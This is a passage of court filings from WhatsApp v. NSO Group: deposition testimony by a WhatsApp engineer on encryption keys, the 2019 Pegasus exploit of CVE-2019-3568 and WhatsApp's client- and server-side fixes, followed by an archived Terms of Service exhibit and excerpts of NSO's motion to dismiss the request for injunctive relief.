So there's multiple keys involved.  And this protocol is fairly complex.  So I'm not an encryption expert, by the way, so I can talk to some aspects of it, but I don't know, like, the -- very little details of, like, how -- how, like -- all the steps involved and all the types of keys.  There are multiple keys involved in this process.

But the idea is that the identity key is something that -- or the private key does never leave the client device.

Q   Okay.  So client device uses this private key to obtain a negotiated key with a chatdserver for each session?

ATTORNEY BLOCK:  Object to form.

Page 140

A   Yes.

Q   (BY ATTORNEY WEINBERG) Okay.  And that negotiated key is what gets passed to -- from the client to the chatdserver upon each request to the chatdserver?

A   The shared key not passed.  The shared key is only used an encryption key for the -- as a block cipher encryption key for the traffic.

And the server uses that shared key to decrypt the -- that payload.

Q   And that same shared key is used to encrypt it?

A   By the client, yes.

Q   Okay.

A   And this is only metadata, by the way.  It does not include, like, the actual content of the messages.  That's a different -- a different thing.

Q   I'm sorry.  The key is used to encrypt only metadata?

A   The -- yes, it's used to encrypt the data that is sent between the client and the server over the Internet so that someone cannot just look at the traffic and understand what the client is talking with the server.

Q   When that message arrives at the

Page 141

chatdserver, the server then decrypts it using the same shared key.

How does it decide that it's an authentic message?

ATTORNEY BLOCK:  Object to form.

A   It would not be able to decrypt the content.  And it would not pass all the -- the checks on the -- so the -- basically, the -- there's a verification process that checks whether the -- the message was tampered with, it was modified.

And it will do all of that upon receival.  The chatdserver will do that before using the payload.

Q   (BY ATTORNEY WEINBERG) And that's just based on the shared key?

A   Yes.

Q   Okay.  You told us a moment ago about the server locations for the chat features.  And I think that you testified earlier today that the VoIP uses the -- those chat servers.

So I just want to confirm that the -- those server locations we discussed just now are for the -- are the servers being used for voice over IP.

ATTORNEY BLOCK:  Object to the form of the question.

Case: 25-7380, 05/13/2026, DktEntry: 36.1, Page 149 of 157
Case 4:19-cv-07123-PJH   Document 401-2   Filed 09/27/24   Page 30 of 112
WhatsApp Inc. vs NSO Group Technologies Limited et al.
WHATSAPP INC. on 08-16-2024                {{Attorneys Eyes Only}}                Job 3296
Pages 270..273

Page 270

of the C2 servers was located on AW -- was hosted by AWS. And we tried to reach out to AWS to give us whatever they had on that machine that had that IP.

I don't know what he means by "payload" in this case. Payload is kind of a generic name, so I don't know what he means by "payload." But that's what I know that we tried to get from AWS.

Q   (BY ATTORNEY WEINBERG) I would presume that the payload from a C2 server is whatever it is that the C2 server is programmed to deliver to a client, right?

ATTORNEY BLOCK:  Object to form; calls for speculation.

A   Yeah, I don't know what he meant.

Q   (BY ATTORNEY WEINBERG) All right.  All right.  So just about the fixes then.

In this document, do you see on page -- the second page in that same Aby John comment that we just spoke about, it discusses server fixes and client fixes.

So can you tell me about the remediation work that WhatsApp did in response to this -- to this incident?

A   Yeah, I can talk about that.

So the remediation -- the immediate

Page 271

remediation of the attack entailed three fixes.  Two of them were server side, and one of them --

Q   Two server side?

A   -- two server-side fixes and one client side fix that was rolled out with all the applications, all the platforms that use WhatsApp, the Android, iPhone, whatever.  Like, all the phones.

Q   The client-side fixes were for Android and iPhone?

A   Yes.  It was a cross -- cross-platform fix.  It was the same fix that would apply to both platforms.

Q   Okay.  So the vulnerability on the client was both an Android and an iOS exploit?

ATTORNEY BLOCK:  Object to form.

A   So the vulnerability was in the C code responsible for handling voice and video calling logic, and it was the same code running on both of these platforms.

Q   (BY ATTORNEY WEINBERG) Okay.  Did WhatsApp have any evidence that any iOS devices were compromised using this vulnerability?

A   From what I remember, yes, we had some iOS -- some samples of the attacks that were

Page 272

targeting iOS devices, but a majority of the samples, from what I remember, was all Android.

Q   I'll have you take a look at Exhibit 1119.

(Exhibit 1119 was marked for identification and is attached to the transcript.)

A   Yeah.

Q   (BY ATTORNEY WEINBERG) Just -- my only questions on this is:  This is a WorkChat that you received on May 14, 2019?

A   Yeah.

Q   I think that's it.

A   Okay.

Q   What was the client-side fix that you talked about?

A   The client-side fix was preventing the buffer overflow that was used in the remote code execution.

So we limited the buffer size sent -- that is sent from the remote end.  We limited it to the size of the buffer that we have locally.  So after that fix, memory corruption could not occur anymore.

Q   Was the buffer overflow vulnerability in a piece of third-party software?

A   No.

Q   And you -- to roll out this

Page 273

server-side fix -- sorry -- the client-side fix, you rolled out an update to the Android Google store?

A   The Play Store.

Q   The Play Store; is that correct?

A   Yes.

ATTORNEY BLOCK:  Objection to form. Sorry.  Belated.

Q   (BY ATTORNEY WEINBERG) Did you send the same update to the Apple Store -- App Store?

ATTORNEY BLOCK:  Objection to form.

A   Yes, we did.

Q   (BY ATTORNEY WEINBERG) Tell me about the server-side fixes.

A   The first fix we rolled out on the server side was for the relay.  And we rolled that out on Friday.  I don't remember the actual date, that week.

Q   Okay.  So what did you do to the relay server --

A   The relay server --

Q   -- software?

A   -- sorry?

Q   The relay server software.

A   Yes.  So the relay server fix was about limiting the messages that were used, the SRTPSR and

Case: 25-7380, 05/13/2026, DktEntry: 36.1, Page 150 of 157
Case 4:19-cv-07123-PJH   Document 401-2   Filed 09/27/24   Page 31 of 112
WhatsApp Inc. vs NSO Group Technologies Limited et al.
WHATSAPP INC. on 08-16-2024          {{Attorneys Eyes Only}}          Job 3296
Pages 274..277

Page 274

RR.

The messages that were used to do -- to exploit the buffer overflow were being kept and dropped by the -- by the server. So a normal WhatsApp application would not send these really large SR and RR SRTP packets. So it was very easy for us to identify the ones sent by a malicious -- by a fake client.

In this case it was the fake client that was attacking the victim, so it was very easy for us to basically put some logic in place that would basically -- that would just drop those SRTPRR messages.

And as an effect, we observed immediately a different behavior in the pattern of the attacks, so we knew for sure that -- that we -- we broke their exploit.

It seemed kind of like it was broken, but it wasn't clear. It seemed broken, but it wasn't clear that we actually found it. And we did it -- that intentionally to monitor their behavior.

Q   So this change to the relay server enhanced the security of the relay server beyond what it was before the fix?

A   No, it did not. It was actually a

Page 275

temporary change that we made only for this. We pulled it out after we rolled out the client fix. We did it just to break their exploit, basically.

From a protocol perspective, the message -- like, you -- it wasn't -- it was just very -- something very specific that only those clients were sending, so that's why we could do it.

Q   And in that respect, the change to the relay server created an additional barrier to -- to the exploit that didn't exist before; so it, therefore, enhanced the security of the relay server beyond what it was?

A   It -- it did not enhance the security of the relay server at all. It -- the only reason why we put that change is to break that specific exploit, yes.

Q   Did the change restore the server to a previous condition?

ATTORNEY BLOCK:  Objection to form.

A   Restore the server to a previous condition?  I'm not sure what that means.

Q   (BY ATTORNEY WEINBERG) The client-side vulnerability, I think that's the one that was reported in the CVE, right?

ATTORNEY BLOCK:  Object to form.

Page 276

A   What CVE?

Q   (BY ATTORNEY WEINBERG) It's this -- the number is listed on the White Paper, if you want to look at it, but CVE-2019-3568.

A   Can I get that?

Q   And 1148 is the exhibit number.

ATTORNEY BLOCK:  You're looking for --

A   Yeah, got it.  3568.  Yes, that's the one.

Q   (BY ATTORNEY WEINBERG) So just for the record, you have identified the same CVE number on the CVE list at Exhibit 1163?

A   Yes.

Q   So this says that the buffer overflow -- I'm looking at Exhibit 1163 at page 4.  And I am looking at the entry here for CVE-2019-3568.

And that's the vulnerability that was closed with the client-side fix, right?

A   Yes.

Q   So this is -- the description of that vulnerability, it says:

A buffer overflow vulnerability in WhatsApp VoIP stack allowed remote code execution via a specially crafted series of RTCP packets sent to a target phone

Page 277

number.  The issue affects WhatsApp for Android prior to Version 2.19.134, WhatsApp Business for Android prior to Version 2.19.44, WhatsApp for iOS prior to Version 2.19.51, and so on.

All right.  So this only refers to the client-side vulnerability, right?  And this -- this CVE refers to the client-side vulnerability?

ATTORNEY BLOCK:  Object to form.

A   Yes.

Q   (BY ATTORNEY WEINBERG) And that vulnerability existed in WhatsApp's code as WhatsApp wrote the code, right?

ATTORNEY BLOCK:  Objection to form.

A   So the way -- the way I look at the vulnerability is it's a -- the vulnerability exists in the moment when you have an attack that exploits it.

Q   (BY ATTORNEY WEINBERG) I don't know if that's right.  What's the difference between a vulnerability and an exploit?

ATTORNEY BLOCK:  Objection to form; scope.

Q   (BY ATTORNEY WEINBERG) Isn't it the case

Page 294

I, MARY J. GOFF, CSR No. 13427, Certified Shorthand Reporter of the State of California, certify;

That the foregoing proceedings were taken before me at the time and place herein set forth, at which time the witness declared under penalty of perjury; that the testimony of the witness and all objections made at the time of the examination were recorded stenographically by me and were thereafter transcribed under my direction and supervision; that the foregoing is a full, true, and correct transcript of my shorthand notes so taken and of the testimony so given;

That before completion of the deposition, review of the transcript ( ) was (XX) was not requested:   (    ) that the witness has failed or refused to approve the transcript.

I further certify that I am not financially interested in the action, and I am not a relative or employee of any attorney of the parties, nor of any of the parties.

I declare under penalty of perjury under the laws of California that the foregoing is true and correct, dated this    day of       , 2024.

_Mary Goff_
_____
MARY J. GOFF

Page 295

ERRATA SHEET

SWIVEL LEGAL

560 W Main Street, C163

Alhambra, California 91801

213-788-2327

CASE:   WhatsApp v. NSO Group

PAGE   LINE   FROM                         TO

____|_____|_____|_____

____|_____|_____|_____

____|_____|_____|_____

____|_____|_____|_____

____|_____|_____|_____

____|_____|_____|_____

____|_____|_____|_____

____|_____|_____|_____

____|_____|_____|_____

____|_____|_____|_____


_____

CLAUDIU GHEORGHE

Subscribed and sworn to before me

this _____ day of _____, 2024.

_____

Notary Public

# EXHIBIT 11

You are currently viewing an archived version of the Terms of Service. View the current version or all past versions.

Last modified: August 25, 2016

# WhatsApp Terms Of Service

WhatsApp Inc. ("WhatsApp," "our," "we," or "us") provides messaging, Internet calling, and other services to users around the world. Please read our Terms of Service so you understand what's up with your use of WhatsApp. You agree to our Terms of Service ("Terms") by installing, accessing, or using our apps, services, features, software, or website (together, "Services").

**NO ACCESS TO EMERGENCY SERVICES: There are important differences between WhatsApp and your mobile and fixed-line telephone and SMS services. Our Services do not provide access to emergency services or emergency services providers, including the police, fire departments, or hospitals, or otherwise connect to public safety answering points. You should ensure you can contact your relevant emergency services providers through a mobile, fixed-line telephone, or other service.**

**IF YOU ARE A WHATSAPP USER LOCATED IN THE UNITED STATES OR CANADA, OUR TERMS CONTAIN A BINDING ARBITRATION PROVISION, WHICH STATES THAT, EXCEPT IF YOU OPT OUT AND EXCEPT FOR CERTAIN TYPES OF DISPUTES, WHATSAPP AND YOU AGREE TO RESOLVE ALL DISPUTES THROUGH BINDING INDIVIDUAL ARBITRATION, WHICH MEANS THAT YOU WAIVE ANY RIGHT TO HAVE THOSE DISPUTES DECIDED BY A JUDGE OR JURY, AND THAT YOU WAIVE YOUR RIGHT TO PARTICIPATE IN CLASS ACTIONS, CLASS ARBITRATIONS, OR REPRESENTATIVE ACTIONS. PLEASE READ THE "SPECIAL ARBITRATION PROVISION FOR UNITED STATES OR CANADA USERS" SECTION BELOW TO LEARN MORE.**

## About our services

CONFIDENTIAL                          **SER-153**                          WA-NSO-00014825

## Acceptable use of our services

**Our Terms and Policies.** You must use our Services according to our Terms and posted policies. If we disable your account for a violation of our Terms, you will not create another account without our permission.

**Legal and Acceptable Use.** You must access and use our Services only for legal, authorized, and acceptable purposes. You will not use (or assist others in using) our Services in ways that: (a) violate, misappropriate, or infringe the rights of WhatsApp, our users, or others, including privacy, publicity, intellectual property, or other proprietary rights; (b) are illegal, obscene, defamatory, threatening, intimidating, harassing, hateful, racially, or ethnically offensive, or instigate or encourage conduct that would be illegal, or otherwise inappropriate, including promoting violent crimes; (c) involve publishing falsehoods, misrepresentations, or misleading statements; (d) impersonate someone; (e) involve sending illegal or impermissible communications such as bulk messaging, auto-messaging, auto-dialing, and the like; or (f) involve any non-personal use of our Services unless otherwise authorized by us.

**Harm to WhatsApp or Our Users.** You must not (or assist others to) access, use, copy, adapt, modify, prepare derivative works based upon, distribute, license, sublicense, transfer, display, perform, or otherwise exploit our Services in impermissible or unauthorized manners, or in ways that burden, impair, or harm us, our Services, systems, our users, or others, including that you must not directly or through automated means: (a) reverse engineer, alter, modify, create derivative works from, decompile, or extract code from our Services; (b) send, store, or transmit viruses or other harmful computer code through or onto our Services; (c) gain or attempt to gain unauthorized access to our Services or systems; (d) interfere with or disrupt the integrity or performance of our Services; (e) create accounts for our Services through unauthorized or automated means; (f) collect the information of or about our users in any impermissible or unauthorized manner; (g) sell, resell, rent, or charge for our Services; or (h) distribute or make our Services available over a network where they could be used by multiple devices at the same time.

**Keeping Your Account Secure.** You are responsible for keeping your device and your WhatsApp account safe and secure, and you must notify us promptly of any unauthorized use or security breach of your account or our Services.

CONFIDENTIAL
WA-NSO-00014827

JOSEPH N. AKROTIRIANAKIS (Bar No. 197971)
  *jakro@kslaw.com*
AARON S. CRAIG (Bar No. 204741)
  *acraig@kslaw.com*
KING & SPALDING LLP
633 West Fifth Street, Suite 1700
Los Angeles, CA 90071
Telephone:     (213) 443-4355
Facsimile:     (213) 443-4310

Attorneys for Defendants NSO GROUP TECHNOLOGIES
LIMITED and Q CYBER TECHNOLOGIES LIMITED

UNITED STATES DISTRICT COURT

NORTHERN DISTRICT OF CALIFORNIA

OAKLAND DIVISION

| | |
|---|---|
| WHATSAPP INC., a Delaware corporation, and FACEBOOK, INC., a Delaware corporation,<br><br>          Plaintiffs,<br><br>     v.<br><br>NSO GROUP TECHNOLOGIES LIMITED and Q CYBER TECHNOLOGIES LIMITED,<br><br>          Defendants. | Case No. 4:19-cv-07123-PJH<br><br>**DEFENDANTS NSO GROUP TECHNOLOGIES LIMITED AND Q CYBER TECHNOLOGIES LIMITED'S MOTION TO DISMISS PLAINTIFFS' REQUEST FOR INJUNCTIVE RELIEF UNDER RULE 12(B)(1)**<br><br>*[Filed Concurrently with [Proposed] Order]*<br><br>Date:    July 29, 2020<br>Time:    9:00 a.m.<br>Ctrm:    3<br>Judge:  Hon. Phyllis J. Hamilton<br><br>Action Filed:  10/29/2019 |

DEFENDANTS' MOTION TO DISMISS                                           Case No. 4:19-cv-07123-PJH
INJUNCTIVE RELIEF

**NOTICE OF MOTION**

**TO THE COURT AND ALL PARTIES AND THEIR COUNSEL OF RECORD:**

**PLEASE TAKE NOTICE** that, on July 29, 2020 at 9:00 a.m., or as soon thereafter as the matter may be heard, Defendants NSO Group Technologies Limited ("NSO") and Q Cyber Technologies Limited ("Q Cyber" and, collectively, "NSO") will bring on for hearing before the Honorable Phyllis J. Hamilton, Chief Judge for the United States District Court for the Northern District of California, Oakland Division, Courtroom 3, located at 1301 Clay Street, Oakland, California, this motion to dismiss Plaintiffs WhatsApp Inc. and Facebook, Inc.'s request for injunctive relief under Fed. R. Civ. P. 12(b)(1). In bringing this motion, Defendants do not concede that they are subject to the personal jurisdiction of this Court and reserve all rights to contest personal jurisdiction. Defendants also do not concede that this Court has subject matter jurisdiction over this proceeding and reserve all rights to contest subject matter jurisdiction.

**STATEMENT OF RELIEF SOUGHT**

By this Motion, Defendants seek an Order dismissing Plaintiffs' request for injunctive relief on the basis that Plaintiffs lack standing to seek the injunctive relief described in the Complaint's Request for Relief (Dkt. No. 1 at 14 ¶ 2).

**POINTS AND AUTHORITIES**

I. **INTRODUCTION**

For approximately 40 days in Spring 2019—from April 2019 to May 13, 2019—Plaintiffs allege that an NSO technology called Pegasus used a single vulnerability in WhatsApp's services to send messages to around 1,400 WhatsApp users. And since May 13, 2019? Nothing. On that day, Plaintiffs closed the vulnerability they allege Pegasus exploited.

Consequently, there is no lawful basis for Plaintiffs to seek an injunction. Plaintiffs have not identified any other use of NSO's technology to send messages using WhatsApp. As Plaintiffs' allegations admit and reveal, WhatsApp is once again secure, its users safe to send encrypted messages (and plan terrorist attacks, and exchange child pornography) without risk of detection by law enforcement and intelligence agencies.

So, even if Plaintiffs could succeed on their claims against NSO—though, as NSO argued

DEFENDANTS' MOTION TO DISMISS
INJUNCTIVE RELIEF

Case No. 4:19-cv-07123-PJH

## IV.    CONCLUSION

The Court should dismiss Plaintiffs' request for injunctive relief for lack of standing.

DATED:  June 24, 2020                    KING & SPALDING LLP


By:  /s/ *Joseph N. Akrotirianakis*
     JOSEPH N. AKROTIRIANAKIS
     AARON S. CRAIG
     Attorneys for Defendants NSO GROUP
     TECHNOLOGIES LIMITED and Q
     CYBER TECHNOLOGIES LIMITED